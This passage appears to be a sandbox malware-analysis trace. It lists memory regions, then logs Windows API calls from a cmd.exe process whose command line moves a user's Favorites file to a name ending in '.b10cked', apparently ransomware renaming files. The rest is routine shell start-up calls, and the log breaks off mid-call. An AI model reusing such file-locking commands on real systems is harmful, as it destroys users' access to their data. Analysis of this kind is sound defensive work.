"apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31416 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31417 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 31418 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31483 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31484 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31485 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" 
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31486 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 31487 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 31488 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31489 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31490 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31491 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31492 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31493 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31494 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: 
id = 31495 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31496 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31497 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 31498 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31499 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31500 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31501 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31502 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31503 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31504 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 31505 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 31506 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 727 os_tid = 0x958 [0213.728] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f7b4 | out: lpSystemTimeAsFileTime=0x20f7b4*(dwLowDateTime=0xb432b620, dwHighDateTime=0x1d440a9)) [0213.728] GetCurrentProcessId () returned 0x990 [0213.728] GetCurrentThreadId () returned 0x958 [0213.728] GetTickCount () returned 0x3be2f [0213.728] QueryPerformanceCounter (in: lpPerformanceCount=0x20f7ac | out: lpPerformanceCount=0x20f7ac*=27051717285) returned 1 [0213.729] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.729] __set_app_type (_Type=0x1) [0213.729] __p__fmode () returned 0x76b331f4 [0213.729] __p__commode () returned 0x76b331fc [0213.729] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.729] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.729] GetCurrentThreadId () returned 0x958 [0213.729] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x958) returned 0x38 [0213.729] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.729] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.729] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.730] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.730] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f744 | out: phkResult=0x20f744*=0x0) returned 0x2 [0213.730] VirtualQuery (in: lpAddress=0x20f77b, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: 
lpAddress=0x110000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.730] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f714, dwLength=0x1c | out: lpBuffer=0x20f714*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0213.730] GetConsoleOutputCP () returned 0x1b5 [0213.730] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.730] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.730] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.730] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.730] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.730] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.731] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.731] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.731] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.731] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.731] GetEnvironmentStringsW () returned 0x3e01b0* [0213.731] 
FreeEnvironmentStringsW (penv=0x3e01b0) returned 1 [0213.731] GetEnvironmentStringsW () returned 0x3e01b0* [0213.731] FreeEnvironmentStringsW (penv=0x3e01b0) returned 1 [0213.731] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e6b4 | out: phkResult=0x20e6b4*=0x40) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0xe8, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x0, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.731] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, 
lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.731] RegCloseKey (hKey=0x40) returned 0x0 [0213.732] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e6b4 | out: phkResult=0x20e6b4*=0x40) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x40, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x1, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x0, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x9, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x4, lpData=0x20e6c0*=0x9, lpcbData=0x20e6b8*=0x4) returned 0x0 [0213.732] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e6bc, lpData=0x20e6c0, lpcbData=0x20e6b8*=0x1000 | out: lpType=0x20e6bc*=0x0, lpData=0x20e6c0*=0x9, lpcbData=0x20e6b8*=0x1000) returned 0x2 [0213.732] 
RegCloseKey (hKey=0x40) returned 0x0 [0213.732] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.732] srand (_Seed=0x5b8863af) [0213.732] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"" [0213.732] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\MICROS~3.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\Microsoft At Work.url.b10cked\"" [0213.732] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.732] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3e1910, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.732] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.733] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.733] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.733] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.733] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.733] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.733] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.733] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.733] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.733] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.733] _wcsicmp (_String1="PROMPT", 
_String2="HIGHESTNUMANODENUMBER") returned 8 [0213.733] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.733] GetEnvironmentStringsW () returned 0x3e2300* [0213.733] FreeEnvironmentStringsW (penv=0x3e2300) returned 1 [0213.733] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.733] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.733] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.733] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.733] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.733] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.733] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.733] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.733] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.733] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.733] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f480 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.733] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f480, lpFilePart=0x20f47c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f47c*="Desktop") returned 0x18 [0213.733] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.733] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f1fc | out: lpFindFileData=0x20f1fc) returned 0x3e0040 [0213.734] FindClose (in: hFindFile=0x3e0040 | out: hFindFile=0x3e0040) returned 1 [0213.734] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f1fc | out: lpFindFileData=0x20f1fc) returned 0x3e0040 [0213.734] FindClose (in: hFindFile=0x3e0040 | out: 
hFindFile=0x3e0040) returned 1 [0213.734] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f1fc | out: lpFindFileData=0x20f1fc) returned 0x3e0040 [0213.734] FindClose (in: hFindFile=0x3e0040 | out: hFindFile=0x3e0040) returned 1 [0213.734] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.734] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.734] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.734] GetEnvironmentStringsW () returned 0x3e2b20* [0213.734] FreeEnvironmentStringsW (penv=0x3e2b20) returned 1 [0213.734] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.735] GetConsoleOutputCP () returned 0x1b5 [0213.735] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.735] GetUserDefaultLCID () returned 0x409 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f5c0, cchData=128 | out: lpLCData="0") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f5c0, cchData=128 | out: lpLCData="0") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f5c0, cchData=128 | out: lpLCData="1") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, 
lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0213.735] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0213.736] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0213.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0213.736] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0213.736] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0213.736] GetConsoleTitleW (in: lpConsoleTitle=0x3d0900, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.736] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0213.737] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0213.737] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0213.737] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0213.737] _wcsicmp (_String1="move", _String2=")") returned 68 [0213.737] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0213.737] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0213.737] _wcsicmp (_String1="IF", _String2="move") returned -4 [0213.737] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0213.737] _wcsicmp (_String1="REM", _String2="move") returned 5 [0213.737] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0213.740] GetConsoleTitleW (in: lpConsoleTitle=0x20f2b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 
0x1b [0213.740] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0213.740] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0213.740] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0213.740] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0213.740] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0213.740] _wcsicmp (_String1="move", _String2="CD") returned 10 [0213.740] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0213.740] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0213.740] _wcsicmp (_String1="move", _String2="REN") returned -5 [0213.740] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0213.740] _wcsicmp (_String1="move", _String2="SET") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0213.741] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0213.741] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0213.741] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0213.741] _wcsicmp (_String1="move", _String2="MD") returned 11 [0213.741] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0213.741] _wcsicmp (_String1="move", _String2="RD") returned -5 [0213.741] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0213.741] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0213.741] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0213.741] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0213.741] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0213.741] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0213.741] _wcsicmp (_String1="move", _String2="VER") returned -9 [0213.741] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0213.741] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0213.741] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0213.741] _wcsicmp (_String1="move", 
_String2="ENDLOCAL") returned 8 [0213.741] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0213.741] _wcsicmp (_String1="move", _String2="START") returned -6 [0213.741] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0213.741] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0213.741] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0213.742] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.742] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0213.743] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x20f074, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x20f06c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x20f06c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0213.743] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0213.748] _wcsnicmp 
(_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0213.748] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", 